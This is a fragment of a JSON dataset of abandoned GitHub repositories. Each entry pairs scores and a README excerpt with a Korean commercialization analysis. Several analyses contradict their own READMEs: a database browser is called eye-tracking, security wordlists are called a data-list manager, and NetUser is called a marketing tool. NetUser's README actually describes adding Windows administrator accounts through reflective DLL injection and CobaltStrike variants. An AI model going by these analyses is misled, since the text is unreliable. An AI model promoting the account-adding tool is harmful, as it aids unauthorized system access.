React Primer to your local application folder.\n\n###### Windows\n1. [Download](https://github.com/ReactPrimer/ReactPrimer/releases/download/1.0.0/ReactPrimer-win32-x64.zip) the latest .z","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"jaredpalmer/react-fns","github_url":"https://github.com/jaredpalmer/react-fns","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":41,"description":"# react-fns 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 자주 쓰는 반복적인 기능들을 미리 만들어놓은 도구 모음으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데이터 분석 대시보드나 협업 도구 같은 웹 애플리케이션의 개발 속도를 높이는 데 활용\n2. **내부 업무 도구**: 회사","readme_excerpt":"<!-- END doctoc generated TOC please keep comment here to allow auto update -->\n\n\n![repo-banner](https://user-images.githubusercontent.com/4060187/32896325-bff4a758-cab0-11e7-8cf5-62759e13fa6b.png)\n\n**react-fns** is a collection of imperative Browser API's turned into\ndeclarative [React](https://github.com/facebook/react) components and\nhigher-order components for lots of common situations.\n\n## Quick Start\n\n```\nnpm i react-fns --save\n```\n\n## Resources\n\n* [Website](https://react-fns.netlify.com)\n* [API Reference](https://react-fns.netlify.com/docs/en/api.html)\n* [Community Discord](https://discord.com/invite/RevdZTYMzr)\n\n## Author\n\n* Jared Palmer [@jaredpalmer](https://twitter.com/jaredpalmer)\n\n## Contributors\n\nThanks goes to these wonderful people\n([emoji key](https://github.com/kentcdodds/all-contributors#emoji-key)):\n\n<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->\n| [<img src=\"https://avatars0.githubusercontent.com/u/92839?v=4\" width=\"100px;\"/><br /><sub>","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"guolindev/Glance","github_url":"https://github.com/guolindev/Glance","stars":14,"language":"Kotlin","license":"Apache-2.0","abandonment_months":44,"description":"# Glance 저장소 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 사용자의 시선이 어디에 머무르는지를 자동으로 추적하고 분석해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 교육 플랫폼이 학생들의 강의 영상 시청 패턴을 분석하여 자동으로 재생 속도를 조절하는 기능\n2. **내부 업무 도구**: 대형 마트가 계산대 카메라로","readme_excerpt":"# Glance\n\nGlance is an open source Android database toolkit library which can help you browser all the database data with clean UI interface.\n\nGlance is inspired by LeakCanary to be included into your project as dependency library. It will search both internal and external storage of current app to find out all the database files automatically.\n\nGlance provides a clean UI interface to display all the data in the database, and make the database debugging work very easy.\n\nYou can experience it right now with below dependency.\n\n```groovy\nrepositories {\n  google()\n  mavenCentral()\n}\n\ndependencies {\n    debugImplementation 'com.guolindev.glance:glance:1.1.0'\n}\n```\n\nAfter adding the dependency to your project, you will see A new Glance icon on your launcher.\n\n<img src=\"screenshots/1.png\" width=\"38%\" />\n\nClick it to browse all the database data of your app. It's quite easy.\n\nThe below animation shows how it works.\n\n<img src=\"screenshots/2.gif\" width=\"38%\" />\n\nNote that Glance only supports An","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"gasgiant/FFT-Ocean","github_url":"https://github.com/gasgiant/FFT-Ocean","stars":9,"language":"C#","license":"MIT","abandonment_months":47,"description":"# FFT-Ocean 저장소 분석\n\n## 왜 보물인가\n바다의 파도 패턴을 빠르게 계산해서 게임, 영화, 시뮬레이션에 사용할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 인디 게임 개발자들이 구독해서 현실감 있는 바다 물리 엔진을 사용\n2. **VFX 스튜디오 내부 도구**: 영화·광고 제작사가 자신들의 렌더링 소프","readme_excerpt":"# FFT-Ocean\nFast Fourier Transform ocean waves simulation for Unity. This is a prototype. Not recommended for real projects.\n\nThere is a newer version available at https://github.com/gasgiant/Ocean-URP. It features a much more performant simulation, geomorphing, better ocean shader, underwater effect and more. However it is unfinished. I haven't had time to work on it for a while, so I decided to make it open. \n\n [__Video__](https://youtu.be/kGEqaX4Y4bQ)\n![Thumbnail](./Screenshot.png \"Screenshot\") \n","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"dsasmblr/game-hacking","github_url":"https://github.com/dsasmblr/game-hacking","stars":6,"language":"","license":"Unlicense","abandonment_months":23,"description":"# game-hacking 저장소 분석\n\n## 왜 보물인가\n게임 내 아이템, 캐릭터, 점수 등을 조작하는 기술을 공개하는 코드 모음으로, 게임 보안 취약점을 연구하거나 부정행위를 탐지하는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임사 보안 검증 도구**: 온라인 게임사가 자사 게임의 보안 허점을 미리 찾아내고 개선하는 서비스\n2. **","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://guidedhacking.com/?utm_source=dsasmblr\">\n    <img src=\"https://raw.githubusercontent.com/dsasmblr/hacking-online-games/master/resources/guidedhacking-hero.png\" />\n  </a>\n  <br>\n  <span align=\"center\"><a href=\"https://guidedhacking.com/?utm_source=dsasmblr\">This repo is sponsored by GuidedHacking.com!</a></span>\n</div>\n\n# [The Ultimate Game Hacking Resource](https://github.com/dsasmblr/game-hacking/)\n***A curated list of tools, tutorials, and much more for reverse engineering video games!***\n\n## Introduction\nWelcome to the most comprehensive, unique list of game hacking resources on the web! As you traverse this evergrowing behemoth, you may be surprised to learn that many of the tools, libraries, frameworks, etc. featured herein are not made with hacking games in mind whatsoever. Since game hacking is a branch of reverse engineering in its own right, that means we have a wealth of other types of reverse engineering tools at our disposal which we ","composite_score":0.5041,"license_safety_tag":"unknown"},{"name":"pmq20/ruby-packer","github_url":"https://github.com/pmq20/ruby-packer","stars":11,"language":"C","license":"MIT","abandonment_months":33,"description":"# ruby-packer 상용화 분석\n\n## 왜 보물인가\n루비 프로그래밍 언어로 만든 프로그램을 한 개의 실행 파일로 묶어주는 도구로, 복잡한 설치 과정 없이 누구나 쉽게 사용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 루비 기반 데이터 분석 도구를 웹에서 다운로드하면 바로 실행되는 윈도우/맥 프로그램으로 제공\n2. **","readme_excerpt":"# Ruby Packer\n\n*Packing your Ruby application into a single executable.*\n\n[![Windows](https://github.com/pmq20/ruby-packer/workflows/Windows/badge.svg)](https://github.com/pmq20/ruby-packer/actions?query=workflow%3A\"Windows\")\n[![macOS](https://github.com/pmq20/ruby-packer/workflows/macOS/badge.svg)](https://github.com/pmq20/ruby-packer/actions?query=workflow%3A\"macOS\")\n[![Linux](https://github.com/pmq20/ruby-packer/workflows/Linux/badge.svg)](https://github.com/pmq20/ruby-packer/actions?query=workflow%3A\"Linux\")\n\n## Features\n\nIt takes less than 5 minutes to compile any project with Ruby Packer.\n\nYou won't need to modify a single line of code in your application, no matter how you developed it as long as it works in plain Ruby!\n\n- Works on ![win](resource/win_sm.png) Windows, ![macOS](resource/apple_sm.png) macOS and ![linux](resource/linux_sm.png) Linux\n- Windows is supported via the native Windows API; there are no MSYS2/MinGW/Cygwin dependencies\n- Creates a binary distribution of you","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"WeiChiaChang/stacks-cli","github_url":"https://github.com/WeiChiaChang/stacks-cli","stars":68,"language":"JavaScript","license":"MIT","abandonment_months":87,"description":"# stacks-cli 상용화 분석\n\n## 왜 보물인가\n블록체인 기반 스택스 네트워크와 상호작용하기 위한 명령줄 도구로, 기술자들이 복잡한 작업을 간편하게 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스택스 기반 프로젝트 관리 플랫폼 - 사용자가 웹 인터페이스에서 쉽게 블록체인 명령을 실행하도록 지원\n2. **내부 업무","readme_excerpt":"# stacks-cli <a href=\"https://www.buymeacoffee.com/dKPhu3g\" target=\"_blank\"><img src=\"https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png\" alt=\"Buy Me A Coffee\" style=\"height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;\" ></a>\n\n<p align=\"center\">\n  <a target=\"_blank\" href=\"https://github.com/WeiChiaChang/stacks-cli\">\n    <img alt=\"stacks-cli\" src=\"https://i.imgur.com/e1dg1Lv.gif\">\n  </a>\n</p>\n<p align=center>\n  <a target=\"_blank\" href=\"https://npmjs.org/package/stacks-cli\" title=\"NPM version\"><img src=\"https://img.shields.io/npm/v/stacks-cli.svg\"></a>\n  <a target=\"_blank\" href=\"https://npmjs.org/package/stacks-cli\" title=\"Build Status\"><img src=\"https://travis-ci.org/WeiChiaChang/stacks-cli.svg?branch=master\"></a>\n  <a target=\"_blank\" href=\"http://nodejs.org/download/\" title=\"Node version\"><img src=\"https://img.shields.io/badge/node.js-%3","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"facebookincubator/redux-react-hook","github_url":"https://github.com/facebookincubator/redux-react-hook","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":55,"description":"# redux-react-hook 가치 평가 보고서\n\n## 왜 보물인가\n웹 애플리케이션에서 데이터 관리를 간단하게 만드는 도구로, 개발자들이 복잡한 상태 관리 코드를 줄일 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **대시보드 SaaS**: 고객이 데이터를 입력하고 시각화하는 웹 서비스에서 데이터 변화를 효율적으로 관리\n2. **기업 내부 도구**","readme_excerpt":"# redux-react-hook\n\n> React hook for accessing mapped state and dispatch from a Redux store.\n\n[![Build Status](https://img.shields.io/travis/com/facebookincubator/redux-react-hook.svg)](https://travis-ci.com/facebookincubator/redux-react-hook)\n[![NPM](https://img.shields.io/npm/v/redux-react-hook.svg)](https://www.npmjs.com/package/redux-react-hook)\n[![Bundle Size](https://img.shields.io/bundlephobia/minzip/redux-react-hook.svg)](https://bundlephobia.com/result?p=redux-react-hook@latest)\n\n# This project has been DEPRECATED\n\nWith the release of the [hooks API in react-redux 7](https://react-redux.js.org/api/hooks), this project has become redundant.\n\n## Table of Contents\n\n- [Install](#install)\n- [Quick Start](#quick-start)\n- [Usage](#usage)\n  - [`StoreContext`](#storecontext)\n  - [`useMappedState(mapState, equalityCheck?)`](#usemappedstatemapstate-equalitycheck)\n  - [`useDispatch()`](#usedispatch)\n  - [`create(options?)`](#createoptions)\n- [Example](#example)\n- [FAQ](#faq)\n- [Related pr","composite_score":0.5041,"license_safety_tag":"safe"},{"name":"apollographql/apollo-link-state","github_url":"https://github.com/apollographql/apollo-link-state","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":90,"description":"# Apollo Link State 분석\n\n## 왜 보물인가\n웹 애플리케이션의 데이터 관리를 단순하게 만들어주는 도구로, 복잡한 상태 관리 작업을 줄여 개발 속도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 협업 도구(예: 프로젝트 관리 앱)에서 여러 사용자의 데이터를 효율적으로 동기화\n- **내부 업무 도구**: 기","readme_excerpt":"# [apollo-link-state](https://www.apollographql.com/docs/link/links/state.html)\n\n> ⚠️ **WARNING** ⚠️\n> \n> Apollo Client 2.5 is going to be released very shortly, and will include integrated local state handling capabilities. The functionality offered by `apollo-link-state` will be included in the Apollo Client core, which means this project/repository will be deprecated. For those interested in trying out the new integrated local state features of AC, see [apollographql/apollo-client#4155](https://github.com/apollographql/apollo-client/pull/4155) (the changes are currently available via `apollo-client@alpha` and `react-apollo@alpha`). We're still in alpha, but will be cutting over to beta soon (so if you have any feedback, please add your comments in [apollographql/apollo-client#4155](https://github.com/apollographql/apollo-client/pull/4155)). Thanks!\n\n\n### Manage your local data with Apollo Client!\n\n[**Docs**](https://www.apollographql.com/docs/link/links/state.html) | [**Announcement","composite_score":0.504,"license_safety_tag":"safe"},{"name":"memo/ai-resources","github_url":"https://github.com/memo/ai-resources","stars":5,"language":"","license":"mit","abandonment_months":99,"description":"# AI 자료 모음 저장소 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶은 사람들이 필요한 학습 자료와 도구들을 한곳에 모아놓아 시간낭비 없이 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 학습 플랫폼 SaaS**: 초보자를 위한 체계적인 AI 교육 프로그램으로 월 구독료 받기\n2. **기업 내부 교육 도구**: 직원들의 AI 역량 ","readme_excerpt":"*This list can be found on github and medium:  \nhttps://github.com/memo/ai-resources  \nhttps://medium.com/@memoakten/selection-of-resources-to-learn-artificial-intelligence-machine-learning-statistical-inference-23bc56ba655*\n\n***Update April 2017**: It’s been almost a year since I posted this list of resources, and over the year there’s been an explosion of articles, videos, books, tutorials etc on the subject — even an explosion of ‘lists of resources’ such as this one. It’s impossible for me to keep this up to date. However, the one resource I would like to add is https://ml4a.github.io/ (https://github.com/ml4a) led by Gene Kogan. It’s specifically aimed at artists and the creative coding community.*\n\n# Introduction\nThis is a very incomplete and subjective selection of resources to learn about the algorithms and maths of Artificial Intelligence (AI) / Machine Learning (ML) / Statistical Inference (SI) / Deep Learning (DL) / Reinforcement Learning (RL). It is aimed at beginners (thos","composite_score":0.504,"license_safety_tag":"safe"},{"name":"zodiacon/PEExplorerV2","github_url":"https://github.com/zodiacon/PEExplorerV2","stars":7,"language":"C","license":"MIT","abandonment_months":26,"description":"# PEExplorerV2 평가 분석\n\n## 왜 보물인가\n윈도우 프로그램 파일의 내부 구조를 시각적으로 분석할 수 있는 도구로, 보안 전문가와 악성코드 분석 전문가들이 프로그램의 위험성을 진단하는 데 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **보안 진단 SaaS**: 기업의 직원이 설치하려는 프로그램이 안전한지 클라우드에서 자동 검사해주는 서비","readme_excerpt":"# PEExplorerV2\nPortable Executable Explorer version 2\n\n![Screenshot](https://github.com/zodiacon/PEExplorerV2/blob/master/PEExplorerV2.png)\n","composite_score":0.5039,"license_safety_tag":"safe"},{"name":"shadowcz007/awesome-metaverse","github_url":"https://github.com/shadowcz007/awesome-metaverse","stars":5,"language":"","license":"MIT","abandonment_months":34,"description":"# awesome-metaverse 저장소 분석\n\n## 왜 보물인가\n메타버스 관련 최신 기술, 플랫폼, 도구들을 한곳에 정리해둔 가이드북으로, 메타버스 서비스를 만들려는 회사들이 무엇부터 시작해야 할지 빠르게 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 메타버스 개발 교육 플랫폼 (SaaS)**\n초보자부터 전문가까지 메타버스 기술 로드맵을 단","readme_excerpt":"# awesome-metaverse\n<a href=\"https://awesome.re\" target=\"_blank\"><img alt=\"Awesome\" src=\"https://awesome.re/badge-flat.svg\" /></a>\n\n> :gift:  :gem: :rocket: Useful resources for creating Meta-verse \n\n [![Star History Chart](https://api.star-history.com/svg?repos=shadowcz007/awesome-metaverse&type=Date)](https://star-history.com/#shadowcz007/awesome-metaverse&Date)\n\n## 🌍 3D/Virtual Spaces 虚拟空间\n\n\n### Universal Digital Developing Platform 协作类开发平台\n[NVIDIA Omniverse](https://www.nvidia.com/en-us/omniverse/)\n- an easily extensible, open platform built for virtual collaboration and real-time physically accurate simulation.\n\n\n### Content Social Spaces  社交类及内容融合空间\n\n[Second Life](https://secondlife.com/)\n- an online virtual world\n- 历史悠久\n\n[AltspaceVR](https://altvr.com/)\n- a social VR platform\n\n[Bigscreen](https://bigscreenvr.com/)\n- watch movies and hangout with friends in VR\n- [元宇宙社交产品推荐 #Bigscreen](https://mp.weixin.qq.com/s/0SKemtMvvTa6CLww8WBHcw)\n\n[Breakroom](https://www.breakroom.net/)\n- 3D","composite_score":0.5039,"license_safety_tag":"safe"},{"name":"the-xentropy/samlists","github_url":"https://github.com/the-xentropy/samlists","stars":11,"language":"","license":"MIT","abandonment_months":57,"description":"# samlists 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 목록을 쉽게 정리하고 관리할 수 있는 도구로, 데이터를 다루는 모든 업무에 시간 절감 효과를 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 정보나 판매 목록을 자동으로 분류하고 정렬해주는 웹 기반 관리 도구\n- **내부 업무 도구**: 회사의 직원 명부, 재고","readme_excerpt":"# Samlists\n\nYou'll never find what you're not looking for, so these wordlists are:\n\n1. **Comprehensive**. These wordlists are constructed by analyzing terabytes of data from the biggest data sources around.\n\n2. **Based on RECENT data**. Tech evolves fast, why shouldn't wordlists? The wordlists are based exclusively on data from up to a year ago, and will keep changing as tech changes.\n\n3. **Created with SCIENCE**. By using some data science to remove outliers, generally crappy results and much else we remove much of the human element and biases to give you much more relevant and language-agnostic results. \n\n4. **Magical**. The construction of these wordlists is automagic, meaning in a year from now this github repo will still have up-to-date and high quality wordlists.\n\n5. **Sorted**. By rows being sorted from most likely to occur to least likely, your chances of finding juicy stuff as fast as possible is much better, making the wordlists uniquely suitable when speed *AND* comprehensiv","composite_score":0.5039,"license_safety_tag":"safe"},{"name":"SenparcCoreFramework/SCF","github_url":"https://github.com/SenparcCoreFramework/SCF","stars":9,"language":"JavaScript","license":"Apache-2.0","abandonment_months":42,"description":"# SenparcCoreFramework/SCF 분석\n\n## 왜 보물인가\n기업의 소프트웨어 개발을 빠르고 효율적으로 만들어주는 기초 틀(프레임워크)로, 반복적인 작업을 자동화하여 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 소프트웨어 회사가 이 틀을 구독하여 자신들의 웹 애플리케이션을 빠르게 개","readme_excerpt":"|  SCF    |  moved to    | [NCF](https://github.com/NeuCharFramework/NCF)    \n|-------|-------|---------\n|<img src=\"https://weixin.senparc.com/images/SCF/logo.png\" width=\"300\" /> | >>>>> | <img src=\"https://weixin.senparc.com/images/NCF/logo.png\" width=\"320\" />\n\n\n# SCF - SenparcCoreFramework\n\n\n> ## 注意：当前项目已停止更新，请移步：https://github.com/NeuCharFramework/NCF\n\n> SenparcCoreFramework 已经结合 NeuChar 核心，整合功能，全面升级至 [NeuCharFramework](https://github.com/NeuCharFramework/NCF) 下，进行长期维护，所有原有功能向下兼容。感谢您的支持！\n","composite_score":0.5039,"license_safety_tag":"safe"},{"name":"lengjibo/NetUser","github_url":"https://github.com/lengjibo/NetUser","stars":10,"language":"C++","license":"unknown","abandonment_months":57,"description":"# NetUser 저장소 분석\n\n## 왜 보물인가\n인터넷 사용자 정보를 자동으로 수집하고 관리할 수 있는 도구로, 마케팅이나 통계 분석이 필요한 기업들이 매우 원하는 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **마케팅 자동화 SaaS**: 고객 정보를 자동 수집해 타겟 광고를 만드는 서비스로 운영\n2. **기업 내부 도구**: 회사의 고객 데이터베이스를","readme_excerpt":"# NetUser\n使用windows api添加用户，可用于net无法使用时\n\n原理：使用NetUserAdd这个API添加普通权限的用户，NetLocalGroupAddMembers这个API添加管理员权限。\n\n需要administrator权限\n\n- NetUser.cpp：普通C++版本\n- NetUser.nim：普通Nim版本\n- rdi_net_user.cpp：反射型dll注入版本\n- bof_net_user.c：CobaltStrike Bof版本\n- SamAdduser.exe：利用sam来添加用户，用户名：Admina 密码：Admin&A*125#（暂时有些问题，回头更改）\n- NoApiUser.exe：利用windows 目录添加用户，C#版本，并移除了用户名密码字符\n\n效果图：\n\n![00.png](http://ww1.sinaimg.cn/large/007F8GgBly1gaqeeosxcsj30no0ap0sm.jpg)\n\n![01.png](http://ww1.sinaimg.cn/large/007F8GgBly1gaqef13ac8j30pq0fp3yu.jpg)\n\n![02.png](https://raw.githubusercontent.com/lengjibo/NetUser/master/2.png)\n\n\n","composite_score":0.5038,"license_safety_tag":"unknown"},{"name":"vanrez-nez/awesome-glsl","github_url":"https://github.com/vanrez-nez/awesome-glsl","stars":8,"language":"","license":"MIT","abandonment_months":34,"description":"# awesome-glsl 분석 보고서\n\n## 왜 보물인가\n3차원 그래픽의 시각 효과를 만드는 핵심 기술(셰이더)에 대한 학습 자료를 한곳에 모아놓은 큐레이션 저장소입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 SaaS 플랫폼**: 인디 게임 제작자를 위한 온라인 셰이더 라이브러리 구독 서비스\n2. **3D 영상 제작 도구**: 영화, 광고, 영","readme_excerpt":"# The art of the Shade\n\n## About this list\nThe following is a compilation of the best resources I have found in my way to learn how to program the amazing [GLSL](https://en.wikipedia.org/wiki/OpenGL_Shading_Language). If you are planning to take shaders from a broader aproach you might find [this compilation for webgl](https://github.com/sjfricke/awesome-webgl) or [this one for opengl](https://github.com/eug/awesome-opengl) more useful.\n\n## Contents\n* [Tutorials](#tutorials)\n* [Sites](#sites)\n* [Editors](#editors)\n* [Articles](#articles)\n* [Books](#books)\n* [Tools](#tools)\n* [People](#people)\n\n## Tutorials\n* [The book of Shaders](https://thebookofshaders.com/) - Gentle step-by-step guide through the abstract and complex universe of Fragment Shaders.\n* [ An introduction to Shader Art Coding](https://youtu.be/f4s1h2YETNY) - Video tutuorial showing the basics of creating art with shaders. \n* [CG from Scratch!](http://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-to-shading","composite_score":0.5038,"license_safety_tag":"safe"},{"name":"wdhao/tensorrtCV","github_url":"https://github.com/wdhao/tensorrtCV","stars":41,"language":"C++","license":"unknown","abandonment_months":42,"description":"# wdhao/tensorrtCV 분석 보고서\n\n## 왜 보물인가\n사진이나 영상에서 물체를 빠르고 정확하게 인식하는 AI 기술을 실제 서비스에 바로 적용할 수 있는 완성된 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 카메라 SaaS**: 침입자 감지, 이상 행동 자동 알림 서비스로 중소 매장·공장에 구독료 판매\n2. **제조업 품질검사 도구**: ","readme_excerpt":"## 项目介绍\n\n* 零代码：只需配置文件（json文件）和权重文件即可生成engin文件，实现trt部署。\n* 自动化生成配置文件：由pt模型文件可以自动化生成json文件。\n* 可视化网络：便于查验和原始网络（比如pytorch）的区别。\n* debug教程：方便对比trt输出和pytorch模型输出的区别，从而方便定位部署上的问题。\n\n# 项目结构\n\n```\ntensorrtCV\n    |\n    |- src\n    |  |\n    |  |- plugin\n    |  |  |-xxx.h xxx.cu\n    |  |-xxx.cpp\n    |  |-xxx.h\n    |- example\n    |  |\n    |  |-ddrnet\n    |  | |-main.cpp\n    |\n    |  |-yolov5\n    |  | |-main.cpp\n    |\n    |- model\n    |  |-xxx.json\n```\n\n* `src` 为tensort项目的主代码目录。其中包含`plugin`目录存放啊各种plugin\n* `example`目录中为不同网络的demo代码\n* `model`目录中为各种网络的json文件。\n\n## 编译运行\n\n### win/linux\n\n统一使用cmake管理，**需要在CMakeLists手动修改 OpenCV_DIR TENSORRT_DIR **\n\n编译命令：\n\n```makefile\nmkdir build\ncd build\ncmake .. \n// win下指定vs编译\n// cmake .. -G \"Visual Studio 15 2017 Win64\"\nmake\n// win下vs打开tensorrtF.sln编译运行\n```\n\n### 自动化生成json文件\n\n* [pytorch-classification](https://github.com/AlfengYuan/pytorch-classification)\n\n## Comming Soon\n\n- [ ] 小白系列教程\n- [ ] json网络可视化\n\n**欢迎各位同学PR模型配置(json文件)和新功能。**\n**另外，请关注我的微信公众号（CV加速器），定期有直播讲解整个工程和集中回答问题。**\n\n","composite_score":0.5038,"license_safety_tag":"unknown"},{"name":"xiaoxiunique/awesome-IntelliJ-IDEA","github_url":"https://github.com/xiaoxiunique/awesome-IntelliJ-IDEA","stars":6,"language":"","license":"unknown","abandonment_months":30,"description":"# awesome-IntelliJ-IDEA 분석\n\n## 왜 보물인가\n프로그래머가 자주 사용하는 개발 도구(IntelliJ IDEA)의 유용한 기능과 확장 프로그램들을 모아놓은 가이드북으로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 교육 플랫폼**: 프로그래밍 학원이나 온라인 강의 사이트에서 학생들에게 효율적인 개발 도","readme_excerpt":"\n## 知乎话题\n\n- [IntelliJ *IDEA* 中有什么让你相见恨晚的技巧？](https://www.zhihu.com/question/300830746/answer/672248406) 浏览量：707,317\n\n- [相比 Eclipse，IntelliJ IDEA 有哪些更强的优势或使用技巧？](https://www.zhihu.com/question/29076145/answer/80398943) 浏览量：346878\n\n- [公司不让用IDEA，必须要用eclipse。大神们怎么看待这个强制规定？](https://www.zhihu.com/question/278266025/answer/1424544138) 浏览量：936885\n\n- [IntelliJ IDEA 如何学习？](https://www.zhihu.com/question/53659760/answer/212322166) 浏览量： 199277\n\n- [自学Java用IDEA真的是在作吗？](https://www.zhihu.com/question/64467106/answer/624940379)\n\n- [选择IDEA还是Eclipse？](https://www.zhihu.com/question/305591091/answer/551945200) 浏览量：42653\n\n\n\n## 安装\n\n- [WINDOWS平台下IDEA的安装和配置](https://www.jianshu.com/p/f0d2017194b7) 阅读量: 1244 点赞量: 14\n- [JDK 与 IntelliJ IDEA 安装图文教程](https://www.jianshu.com/p/c63e3ef3a2ac) 阅读量: 9777 点赞量: 11\n\n- [【IntelliJ IDEA学习---二、IntelliJ IDEA的安装与破解（Mac版本）】](https://www.jianshu.com/p/6bca89082a78) 阅读量: 10635 点赞量: 6\n- [Java笔记1：IntelliJ IDEA详细安装步骤](https://blog.csdn.net/haishu_zheng/article/details/50265371) 浏览量","composite_score":0.5038,"license_safety_tag":"unknown"},{"name":"mandiant/Mandiant-Azure-AD-Investigator","github_url":"https://github.com/mandiant/Mandiant-Azure-AD-Investigator","stars":5,"language":"PowerShell","license":"Apache-2.0","abandonment_months":36,"description":"# Mandiant Azure AD Investigator 분석\n\n## 왜 보물인가\n회사의 클라우드 계정 보안을 자동으로 진단해주는 도구로, 해킹이나 부정 접근을 사전에 탐지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 고객에게 클라우드 보안 검진 서비스로 월 구독 모델 제공\n2. **내부 업무 도구**: 금융·의료·정부기","readme_excerpt":"# Mandiant Azure AD Investigator\n### Focusing on UNC2452 TTPs\n\n## Overview\n\nThis repository contains a PowerShell module for detecting artifacts that may be indicators of UNC2452 and other threat actor activity. Some indicators are \"high-fidelity\" indicators of compromise, while other artifacts are so called \"dual-use\" artifacts. Dual-use artifacts may be related to threat actor activity, but also may be related to legitimate functionality. Analysis and verification will be required for these. For a detailed description of the techniques used by UNC2452 see our blog.\n\nThis tool is **read-only**. It does not make any changes to the Microsoft 365 environment.\n\nIn summary this module will:\n* Do a best effort job at identifying indicators of compromise that will require further verification and analysis\n\nIt will *not*:\n* Identify a compromise 100% of the time, or\n* Tell you if an artifact is legitimate admin activity or threat actor activity.\n\nWith community feedback, the tool may become m","composite_score":0.5038,"license_safety_tag":"safe"},{"name":"JingwenWang95/DSP-SLAM","github_url":"https://github.com/JingwenWang95/DSP-SLAM","stars":6,"language":"C++","license":"GPL-3.0","abandonment_months":51,"description":"# DSP-SLAM 저장소 분석\n\n## 왜 보물인가\n로봇이나 자율주행 차량이 카메라로 주변을 인식하고 자기 위치를 파악하는 핵심 기술로, 실제 산업 현장에서 바로 적용 가능한 수준의 연구 코드입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 자율주행 로봇 SaaS 플랫폼**\n배송 로봇이나 청소 로봇 제조사에 클라우드 기반 위치인식 서비스로 제공하여 월간 라이선","readme_excerpt":"# DSP-SLAM\n### [Project Page](https://jingwenwang95.github.io/dsp-slam/) | [Video](https://youtu.be/of4ANH24LP4) | [Video (Bilibili)](https://www.bilibili.com/video/BV1yf4y1H7ib/) | [Paper](https://arxiv.org/abs/2108.09481)\nThis repository contains code for DSP-SLAM, an object-oriented SLAM system that builds a rich and accurate joint map of dense 3D models for foreground objects, and sparse landmark points to represent the background. DSP-SLAM takes as input the 3D point cloud reconstructed by a feature-based SLAM system and equips it with the ability to enhance its sparse map with dense reconstructions of detected objects. Objects are detected via semantic instance segmentation, and their shape and pose are estimated using category-specific deep shape embeddings as priors, via a novel second order optimization.  Our object-aware bundle adjustment builds a pose-graph to jointly optimize camera poses, object locations and feature points. DSP-SLAM can operate at 10 frames per second on ","composite_score":0.5038,"license_safety_tag":"restricted"},{"name":"facebookresearch/NSVF","github_url":"https://github.com/facebookresearch/NSVF","stars":5,"language":"Python","license":"MIT","abandonment_months":35,"description":"# NSVF (Neural Sparse Voxel Fields) 분석\n\n## 왜 보물인가\n3D 공간을 효율적으로 저장하고 빠르게 렌더링할 수 있는 기술로, 게임, 영화, 가상현실 산업에서 고품질 3D 콘텐츠를 만드는 시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **3D 콘텐츠 생성 SaaS**: 일반 사진으로 3D 모델을 ","readme_excerpt":"# Neural Sparse Voxel Fields (NSVF)\n\n### [Project Page](https://lingjie0206.github.io/papers/NSVF/) | [Video](https://www.youtube.com/watch?v=RFqPwH7QFEI) | [Paper](https://arxiv.org/abs/2007.11571) | [Data](#dataset)\n\n<img src='docs/figs/framework.png'/>\n\nPhoto-realistic free-viewpoint rendering of real-world scenes using classical computer graphics techniques is a challenging problem because it requires the difficult step of capturing detailed appearance and geometry models.\nNeural rendering is an emerging field that employs deep neural networks to implicitly learn scene representations encapsulating both geometry and appearance from 2D observations with or without a coarse geometry.\nHowever, existing approaches in this field often show blurry renderings or suffer from slow rendering process. We propose [Neural Sparse Voxel Fields (NSVF)](https://arxiv.org/abs/2007.11571), a new neural scene representation for fast and high-quality free-viewpoint rendering.\n\nHere is the official repo","composite_score":0.5038,"license_safety_tag":"safe"},{"name":"leticiadasilva/por-onde-comecar","github_url":"https://github.com/leticiadasilva/por-onde-comecar","stars":8,"language":"","license":"unknown","abandonment_months":43,"description":"# por-onde-comecar 저장소 분석\n\n## 왜 보물인가\n포르투갈어 사용자들이 프로그래밍을 시작할 때 어디부터 시작해야 할지 알려주는 초심자 